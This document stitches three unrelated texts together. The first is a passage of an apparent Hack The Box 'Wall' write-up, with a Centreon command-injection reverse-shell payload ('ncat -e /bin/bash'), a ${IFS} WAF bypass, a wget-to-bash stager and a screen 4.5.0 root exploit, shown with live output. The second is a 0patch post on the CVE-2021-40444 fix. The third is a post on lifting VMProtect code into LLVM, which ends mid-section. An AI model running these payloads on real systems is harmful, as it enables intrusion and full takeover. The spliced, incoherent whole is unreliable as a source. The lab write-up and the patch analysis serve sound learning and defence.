    "init_script_centreontrapd": "centreontrapd",
    "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
    "ns_activate[ns_activate]": "1",
    "submitC": "Save",
    "id": "1",
    "o": "c",
    "centreon_token": poller_token,
}
nagios_bin is the vulnerable parameter:
# this value contains the payload , you can change it as you want
"nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
I checked the configuration page and looked at the HTML source; nagios_bin is the monitoring engine binary, so I tried to inject a command there:
When I tried to save the configuration I got a 403:
That's because a WAF is blocking these attempts. I could bypass the WAF by replacing the spaces in the commands with ${IFS}. I saved the reverse shell payload in a file, then used wget to fetch the file contents and piped them to bash:
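The substitution itself is trivial; a tiny helper (hypothetical, just to illustrate the trick, with a placeholder staged payload) shows what a WAF-safe command looks like:

```python
def ifs_encode(cmd: str) -> str:
    """Replace spaces with ${IFS} so a space-filtering WAF won't block the command."""
    return cmd.replace(" ", "${IFS}")

# hypothetical staged payload: fetch a script and pipe it to bash
print(ifs_encode("wget -qO- http://10.10.xx.xx/shell.sh | bash"))
# wget${IFS}-qO-${IFS}http://10.10.xx.xx/shell.sh${IFS}|${IFS}bash
```

The shell expands ${IFS} back to whitespace when the injected command runs, so the semantics are unchanged.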
root@kali:~/Desktop/HTB/boxes/wall# python exploit.py http://wall.htb/centreon/ admin password1 10.10.xx.xx 1337
[+] Retrieving CSRF token to submit the login form
exploit.py:38: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.
The code that caused this warning is on line 38 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
soup = BeautifulSoup(html_content)
[+] Login token is : ba28f431a995b4461731fb394eb01d79
[+] Logged In Sucssfully
[+] Retrieving Poller token
exploit.py:56: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.
The code that caused this warning is on line 56 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
poller_soup = BeautifulSoup(poller_html)
[+] Poller token is : d5702ae3de1264b0692afcef86074f07
[+] Injecting Done, triggering the payload
[+] Check your netcat listener !
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.157] 37862
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Wall:/usr/local/centreon/www$ ^Z
[1]+ Stopped nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/wall# stty raw -echo
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
www-data@Wall:/usr/local/centreon/www$ export TERM=screen
www-data@Wall:/usr/local/centreon/www$
Screen 4.5.0 –> Root Shell –> User & Root Flags
There were two users on the box, shelby and sysmonitor. I couldn’t read the user flag as www-data:
I searched for suid binaries and saw screen-4.5.0; similar to the privesc in Flujab, I used this exploit.
The exploit script didn't work properly, so I did it manually. I compiled the binaries on my box:
libhax.c:
Then I uploaded them to the box and did the rest of the exploit:
www-data@Wall:/home/shelby$ cd /tmp/
www-data@Wall:/tmp$ wget http://10.10.xx.xx/libhax.so
--2019-12-07 00:23:12-- http://10.10.xx.xx/libhax.so
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'
libhax.so 100%[===================>] 15.77K 11.7KB/s in 1.3s
2019-12-07 00:23:14 (11.7 KB/s) - 'libhax.so' saved [16144/16144]
www-data@Wall:/tmp$ wget http://10.10.xx.xx/rootshell
--2019-12-07 00:23:20-- http://10.10.xx.xx/rootshell
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'
rootshell 100%[===================>] 16.44K 16.3KB/s in 1.0s
2019-12-07 00:23:22 (16.3 KB/s) - 'rootshell' saved [16832/16832]
www-data@Wall:/tmp$
www-data@Wall:/tmp$ cd /etc
www-data@Wall:/etc$ umask 000
www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@Wall:/etc$ /bin/screen-4.5.0 -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
www-data@Wall:/etc$ /tmp/rootshell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data),6000(centreon)
#
And we owned root!
That's it, feedback is appreciated!
Don't forget to read the previous write-ups. Tweet about the write-up if you liked it, and follow @Ahm3d_H3sham on Twitter. Thanks for reading.
September 2021 Windows Updates brought a fix for CVE-2021-40444, a critical vulnerability in Windows that allowed a malicious Office document to download a remote executable file and execute it locally when the document was opened. This vulnerability was found being exploited in the wild.
The Vulnerability
Unfortunately, CVE-2021-40444 does not cover just one flaw but two; this can lead to some confusion:
Path traversal in CAB file extraction: The exploit was utilizing this flaw to place a malicious executable file in a known location instead of a randomly-named subfolder, where it would originally be extracted.
"File extension" URL scheme: For some reason, Windows ShellExecute function, a very complex function capable of launching local applications in various ways including via URLs, supported an undocumented URL scheme mapped to registered file extensions on the computer. The exploit was utilizing this "feature" to launch the previously downloaded executable file with the Control Panel application and have it executed via URL ".cpl:../../../../../Temp/championship.cpl". In this case, ".cpl" was considered a URL scheme, and since .cpl extension is associated with control.exe, this app would get launched and given the provided path as an argument.
The second flaw is the more critical one, as there may exist various other ways to get a malicious file onto a user's computer (e.g., via the Downloads folder) and still exploit this second flaw to execute such a file.
Microsoft's Patch
Microsoft's patch added a check before calling ShellExecute on the provided URL that blocks URL schemes beginning with a non-alphanumeric character (blocking schemes beginning with a dot, such as ".cpl"), and further limits the allowed set of characters for the remaining string.
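As a rough illustration of the kind of check described above (a sketch of the described logic, not Microsoft's actual code):

```python
import string

_ALNUM = set(string.ascii_letters + string.digits)
# conservative character set for the rest of the scheme (an assumption here)
_SCHEME_CHARS = _ALNUM | set("+-.")

def scheme_allowed(url: str) -> bool:
    """Reject URL schemes that start with a non-alphanumeric character
    (e.g. '.cpl') and restrict the remaining scheme characters."""
    scheme, sep, _rest = url.partition(":")
    if not sep or not scheme:
        return False
    if scheme[0] not in _ALNUM:
        return False
    return all(c in _SCHEME_CHARS for c in scheme[1:])

print(scheme_allowed(".cpl:../../../../../Temp/championship.cpl"))  # False
print(scheme_allowed("https://example.com"))  # True
```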
Note that the ShellExecute function itself was not patched, and you can still launch a DLL via the Control Panel app by clicking the Windows Start button and typing in a ".cpl:/..." URL. Effectively, therefore, support for the "File extension" URL scheme was not eliminated across all of Windows, just made inaccessible from applications utilizing Internet Explorer components for opening URLs. Hopefully, remotely delivered content can't find some other way to reach ShellExecute that bypasses this new security check.
Our Micropatch
Microsoft's update fixed both flaws, but we decided to only patch the "File extension" URL scheme flaw until someone demonstrates the first flaw to be exploitable by itself.
The "File extension" URL scheme flaw was actually present in two places, in mshtml.dll (reachable from Office documents) and in ieframe.dll (reachable from Internet Explorer), so we had to patch both these executables.
Since an official vendor fix is available, it was our goal to provide patches for affected Windows versions that we have "security-adopted", as they're not receiving official vendor patches anymore. Among these, our tests have shown that only Windows 10 v1803 and v1809 were affected; the File Extension URL scheme "feature" was apparently added in Windows 8.1.
We expect many Windows 10 v1903 machines out there may also be affected, so we decided to port the micropatch to this version as well.
Our CVE-2021-40444 micropatches are therefore available for:
Windows 10 v1803 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
Windows 10 v1809 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
Windows 10 v1903 32bit or 64bit (updated with December 2020 Updates - latest before end of support)
Below is a video of our patch in action. Notice that with 0patch disabled, Calculator is launched both upon opening the Word document and upon previewing the RTF document in Windows Explorer Preview. In both cases, Process Monitor shows that control.exe gets launched, which loads the "malicious" executable, in our case spawning Calculator. With 0patch enabled, control.exe does not get launched, and therefore neither does Calculator.
In line with our guidelines, these patches require a PRO license. To obtain them and have them applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account, then purchase 0patch PRO. For a free trial, contact [email protected].
Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatches.
We'd like to thank Will Dormann for an in-depth public analysis of this vulnerability, which helped us create a micropatch and protect our users.
To learn more about 0patch, please visit our Help Center.
This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:
First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.
In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I, hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
In 2018, a person nicknamed RYDB3RG posted on Tuts4You a first insight into how LLVM optimizations could be beneficial when optimizing VMProtected code, although the simple example provided left me with a lot of questions about whether that approach would be hassle-free or not.
In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.
The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.
Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.
With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.
I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.
Lifting
The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.
Enough words and code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to making LLVM's job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.
Liveness and aliasing information
Let’s start by saying that many deobfuscation tools are completely disregarding, or at best unsoundly handling, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM on the contrary is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally LLVM also has strong optimization passes benefiting from precise liveness information, that we absolutely want to take advantage of to clean any unnecessary stores to memory that are irrelevant after the execution of the virtualized code.
This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.
A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.
At a high level we can summarize the data-related virtual machine components as follows:
30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.
19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.
16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won't affect the others. Contrary to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is treated like the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.
4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers, and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct from each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.
Helper functions
With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.
When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.
Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):
struct VirtualRegister final {
  union {
    alignas(1) struct {
      uint8_t b0; uint8_t b1; uint8_t b2; uint8_t b3;
      uint8_t b4; uint8_t b5; uint8_t b6; uint8_t b7;
    } byte;
    alignas(2) struct {
      uint16_t w0; uint16_t w1; uint16_t w2; uint16_t w3;
    } word;
    alignas(4) struct {
      uint32_t d0; uint32_t d1;
    } dword;
    alignas(8) uint64_t qword;
  } __attribute__((packed));
} __attribute__((packed));

using rref = size_t &__restrict__;

extern "C" uint8_t RAM[0];
extern "C" uint8_t GS[0];
extern "C" uint8_t FS[0];

extern "C" size_t HelperStub(
    rref rax, rref rbx, rref rcx, rref rdx, rref rsi, rref rdi,
    rref rbp, rref rsp, rref r8, rref r9, rref r10, rref r11,
    rref r12, rref r13, rref r14, rref r15, rref flags,
    size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR,
    rref vsp, rref vip,
    VirtualRegister *__restrict__ vmregs,
    size_t *__restrict__ slots);

extern "C" size_t HelperFunction(
    rref rax, rref rbx, rref rcx, rref rdx, rref rsi, rref rdi,
    rref rbp, rref rsp, rref r8, rref r9, rref r10, rref r11,
    rref r12, rref r13, rref r14, rref r15, rref flags,
    size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR) {
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[19] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp,
                   r8, r9, r10, r11, r12, r13, r14, r15,
                   flags, KEY_STUB, RET_ADDR, REL_ADDR,
                   vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}
The VirtualRegister structure is meant to represent a VmRegister, divided into smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don't necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64-bit bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.
The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions; once compiled to LLVM-IR, it will generate a pointer parameter with a noalias attribute. The noalias attribute hints to the compiler that a memory access inside the function which does not dereference a pointer derived from the pointer parameter is guaranteed not to alias with a memory access that does dereference a pointer derived from it.
The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.
The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.
The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.
The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.
The compiled and optimized LLVM-IR code for the described C++ definitions follows:
We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.
The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.
STACK_PUSH
To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.
template <typename T>
__attribute__((always_inline)) void STACK_PUSH(size_t &vsp, T value) {
  // Update the stack pointer
  vsp -= sizeof(T);
  // Store the value
  std::memcpy(&RAM[vsp], &value, sizeof(T));
}
We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.
STACK_POP
As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.
template <typename T>
__attribute__((always_inline)) T STACK_POP(size_t &vsp) {
  // Fetch the value
  T value = 0;
  std::memcpy(&value, &RAM[vsp], sizeof(T));
  // Undefine the stack slot
  T undef = UNDEF<T>();
  std::memcpy(&RAM[vsp], &undef, sizeof(T));
  // Update the stack pointer
  vsp += sizeof(T);
  // Return the value
  return value;
}
We can see that the value is read from the stack using the same std::memcpy logic explained above, an undefined value is written to the current stack slot and the virtual stack pointer is incremented using the byte size of the template parameter. As in the previous case, the -O3 optimizations will take care of inlining and lowering the std::memcpy call.
ADD
Being a stack machine, we know that it is going to pop the two input operands from the top of the stack, add them together, calculate the updated flags and push the result and the flags back onto the stack. There are four variations of the addition handler, meant to handle 8/16/32/64-bit operands, with the peculiarity that the 8-bit case actually pops 16 bits per operand off the stack and pushes a 16-bit result back onto the stack, to be consistent with the x64 push/pop alignment rules.
From what we just described, the only thing we need to be able to access the stack is the virtual stack pointer.
// ADD semantic

template <typename T>
__attribute__((always_inline)) __attribute__((const))
bool AF(T lhs, T rhs, T res) {
  return AuxCarryFlag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline)) __attribute__((const))
bool PF(T res) {
  return ParityFlag(res);
}

template <typename T>
__attribute__((always_inline)) __attribute__((const))
bool ZF(T res) {
  return ZeroFlag(res);
}

template <typename T>
__attribute__((always_inline)) __attribute__((const))
bool SF(T res) {
  return SignFlag(res);
}

template <typename T>
__attribute__((always_inline)) __attribute__((const))
bool CF_ADD(T lhs, T rhs, T res) {
  return Carry<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline)) __attribute__((const))
bool OF_ADD(T lhs, T rhs, T res) {
  return Overflow<tag_add>::Flag(lhs, rhs, res);
}

template <typename T>
__attribute__((always_inline))
void ADD_FLAGS(size_t &flags, T lhs, T rhs, T res) {
  // Calculate the flags
  bool cf = CF_ADD(lhs, rhs, res);
  bool pf = PF(res);
  bool af = AF(lhs, rhs, res);
  bool zf = ZF(res);
  bool sf = SF(res);
  bool of = OF_ADD(lhs, rhs, res);
  // Update the flags
  UPDATE_EFLAGS(flags, cf, pf, af, zf, sf, of);
}

template <typename T>
__attribute__((always_inline))
void ADD(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Initialize the operands
  T op1 = 0;
  T op2 = 0;
  // Fetch the operands
  if (isByte) {
    op1 = Trunc(STACK_POP<uint16_t>(vsp));
    op2 = Trunc(STACK_POP<uint16_t>(vsp));
  } else {
    op1 = STACK_POP<T>(vsp);
    op2 = STACK_POP<T>(vsp);
  }
  // Calculate the add
  T res = UAdd(op1, op2);
  // Calculate the flags
  size_t flags = 0;
  ADD_FLAGS(flags, op1, op2, res);
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(res));
  } else {
    STACK_PUSH<T>(vsp, res);
  }
  // Save the flags
  STACK_PUSH<size_t>(vsp, flags);
}

DEFINE_SEMANTIC_64(ADD_64) = ADD<uint64_t>;
DEFINE_SEMANTIC(ADD_32) = ADD<uint32_t>;
DEFINE_SEMANTIC(ADD_16) = ADD<uint16_t>;
DEFINE_SEMANTIC(ADD_8) = ADD<uint8_t>;
We can see that the function definition is templated with a T parameter that is internally used to generate the properly sized stack accesses executed by the STACK_PUSH and STACK_POP helpers defined above. Additionally, we take care of truncating and zero-extending the special 8-bit case. Finally, after the unsigned addition has taken place, we rely on Remill's semantically proven flag computations to calculate the fresh flags before pushing them to the stack.
The other binary and arithmetic operations are implemented following the same structure, with the appropriate operand accesses and flag computations.
PUSH_VMREG
This handler is meant to fetch the value stored in a VmRegister and push it to the stack. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are the virtual stack pointer and the value of the VmRegister. The template additionally defines the size of the pushed value and its offset from the base of the VmRegister slot.
template <size_t Size, size_t Offset>
__attribute__((always_inline))
void PUSH_VMREG(size_t &vsp, VirtualRegister vmreg) {
  // Update the stack pointer
  vsp -= ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
  // Select the proper element of the virtual register
  if constexpr (Size == 64) {
    std::memcpy(&RAM[vsp], &vmreg.qword, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d0, sizeof(uint32_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.dword.d1, sizeof(uint32_t));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      std::memcpy(&RAM[vsp], &vmreg.word.w0, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      std::memcpy(&RAM[vsp], &vmreg.word.w1, sizeof(uint16_t));
    } else if constexpr (Offset == 2) {
      std::memcpy(&RAM[vsp], &vmreg.word.w2, sizeof(uint16_t));
    } else if constexpr (Offset == 3) {
      std::memcpy(&RAM[vsp], &vmreg.word.w3, sizeof(uint16_t));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = ZExt(vmreg.byte.b0);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    } else if constexpr (Offset == 1) {
      uint16_t byte = ZExt(vmreg.byte.b1);
      std::memcpy(&RAM[vsp], &byte, sizeof(uint16_t));
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
}

DEFINE_SEMANTIC(PUSH_VMREG_8_LOW) = PUSH_VMREG<8, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_8_HIGH) = PUSH_VMREG<8, 1>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWLOW) = PUSH_VMREG<16, 0>;
DEFINE_SEMANTIC(PUSH_VMREG_16_LOWHIGH) = PUSH_VMREG<16, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHLOW) = PUSH_VMREG<16, 2>;
DEFINE_SEMANTIC_64(PUSH_VMREG_16_HIGHHIGH) = PUSH_VMREG<16, 3>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_LOW) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_32(PUSH_VMREG_32) = PUSH_VMREG<32, 0>;
DEFINE_SEMANTIC_64(PUSH_VMREG_32_HIGH) = PUSH_VMREG<32, 1>;
DEFINE_SEMANTIC_64(PUSH_VMREG_64) = PUSH_VMREG<64, 0>;
We can see how the proper VmRegister sub-chunk is accessed based on the size and offset template parameters (e.g. vmreg.word.w1, vmreg.qword) and how once again the std::memcpy is used to implement a safe memory write on the indexed RAM array. The virtual stack pointer is also decremented as usual.
POP_VMREG
This handler is meant to pop a value from the stack and store it into a VmRegister. The value can also be a sub-chunk of the virtual register, not necessarily starting from the base of the VmRegister slot. Therefore the function arguments are the virtual stack pointer and a reference to the VmRegister to be updated. As before, the template defines the size of the popped value and the offset into the VmRegister slot.
template <size_t Size, size_t Offset>
__attribute__((always_inline))
void POP_VMREG(size_t &vsp, VirtualRegister &vmreg) {
  // Fetch and store the value on the virtual register
  if constexpr (Size == 64) {
    uint64_t value = 0;
    std::memcpy(&value, &RAM[vsp], sizeof(uint64_t));
    vmreg.qword = value;
  } else if constexpr (Size == 32) {
    if constexpr (Offset == 0) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF00000000) | value);
    } else if constexpr (Offset == 1) {
      uint32_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint32_t));
      vmreg.qword = ((vmreg.qword & 0x00000000FFFFFFFF) | UShl(ZExt(value), 32));
    }
  } else if constexpr (Size == 16) {
    if constexpr (Offset == 0) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFFFFFF0000) | value);
    } else if constexpr (Offset == 1) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFFFFFF0000FFFF) | UShl(ZExtTo<uint64_t>(value), 16));
    } else if constexpr (Offset == 2) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0xFFFF0000FFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 32));
    } else if constexpr (Offset == 3) {
      uint16_t value = 0;
      std::memcpy(&value, &RAM[vsp], sizeof(uint16_t));
      vmreg.qword = ((vmreg.qword & 0x0000FFFFFFFFFFFF) | UShl(ZExtTo<uint64_t>(value), 48));
    }
  } else if constexpr (Size == 8) {
    if constexpr (Offset == 0) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b0 = Trunc(byte);
    } else if constexpr (Offset == 1) {
      uint16_t byte = 0;
      std::memcpy(&byte, &RAM[vsp], sizeof(uint16_t));
      vmreg.byte.b1 = Trunc(byte);
    }
    // NOTE: there might be other offsets here, but they were not observed
  }
  // Clear the value on the stack
  if constexpr (Size == 64) {
    uint64_t undef = UNDEF<uint64_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint64_t));
  } else if constexpr (Size == 32) {
    uint32_t undef = UNDEF<uint32_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint32_t));
  } else if constexpr (Size == 16) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  } else if constexpr (Size == 8) {
    uint16_t undef = UNDEF<uint16_t>();
    std::memcpy(&RAM[vsp], &undef, sizeof(uint16_t));
  }
  // Update the stack pointer
  vsp += ((Size != 8) ? (Size / 8) : ((Size / 8) * 2));
}

DEFINE_SEMANTIC(POP_VMREG_8_LOW) = POP_VMREG<8, 0>;
DEFINE_SEMANTIC(POP_VMREG_8_HIGH) = POP_VMREG<8, 1>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWLOW) = POP_VMREG<16, 0>;
DEFINE_SEMANTIC(POP_VMREG_16_LOWHIGH) = POP_VMREG<16, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHLOW) = POP_VMREG<16, 2>;
DEFINE_SEMANTIC_64(POP_VMREG_16_HIGHHIGH) = POP_VMREG<16, 3>;
DEFINE_SEMANTIC_64(POP_VMREG_32_LOW) = POP_VMREG<32, 0>;
DEFINE_SEMANTIC_64(POP_VMREG_32_HIGH) = POP_VMREG<32, 1>;
DEFINE_SEMANTIC_64(POP_VMREG_64) = POP_VMREG<64, 0>;
In this case we can see that the update of the VmRegister sub-chunks is done with masking, shifting and zero extension. This helps LLVM merge smaller integer values into a bigger integer value whenever possible. As in the STACK_POP operation, we write an undefined value to the vacated stack slot. Finally, we increment the virtual stack pointer.
LOAD and LOAD_GS
Generally speaking, the LOAD handler is meant to pop an address from the stack, dereference it to load a value from one of the program segments, and push the retrieved value to the top of the stack.
